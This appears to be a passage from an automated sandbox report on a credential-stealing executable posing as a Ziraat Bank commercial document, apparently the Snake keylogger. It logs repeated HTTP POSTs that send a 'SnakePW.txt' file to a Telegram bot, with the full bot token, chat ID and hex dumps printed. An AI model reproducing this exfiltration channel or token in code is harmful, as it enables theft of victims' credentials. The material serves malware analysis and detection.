                                      2024-09-26 09:01:27 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 32 38 37 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35864,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341287,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      91192.168.2.449840149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:28 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd01f3f5b901aa
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:01:28 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 31 66 33 66 35 62 39 30 31 61 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd01f3f5b901aaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:28 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:28 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:28 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 32 38 38 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35865,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341288,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      92192.168.2.449841149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:29 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd026a531c5b05
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:01:29 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 32 36 61 35 33 31 63 35 62 30 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd026a531c5b05Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:29 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:29 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:29 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 36 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 32 38 39 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35866,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341289,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      93192.168.2.449842149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:30 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd02be3a529e52
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:01:30 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 32 62 65 33 61 35 32 39 65 35 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd02be3a529e52Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:30 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:30 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:30 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 36 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 32 39 30 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35867,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341290,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      94192.168.2.449843149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:31 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd03130094d087
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:01:31 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 33 31 33 30 30 39 34 64 30 38 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd03130094d087Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:32 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:32 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:32 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 36 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 32 39 32 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35868,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341292,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      95192.168.2.449844149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:32 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd038bba82bd16
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:01:32 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 33 38 62 62 61 38 32 62 64 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd038bba82bd16Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:33 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:33 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:33 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 36 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 32 39 33 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35869,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341293,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      96192.168.2.449845149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:33 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd03cc8c45aec3
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:01:33 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 33 63 63 38 63 34 35 61 65 63 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd03cc8c45aec3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:34 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:34 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:34 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 37 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 32 39 34 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35870,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341294,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      97192.168.2.449846149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:35 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd0426a2e8f167
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:01:35 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 34 32 36 61 32 65 38 66 31 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd0426a2e8f167Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:35 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:35 GMT
                                      Content-Type: application/json
                                      Content-Length: 516
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
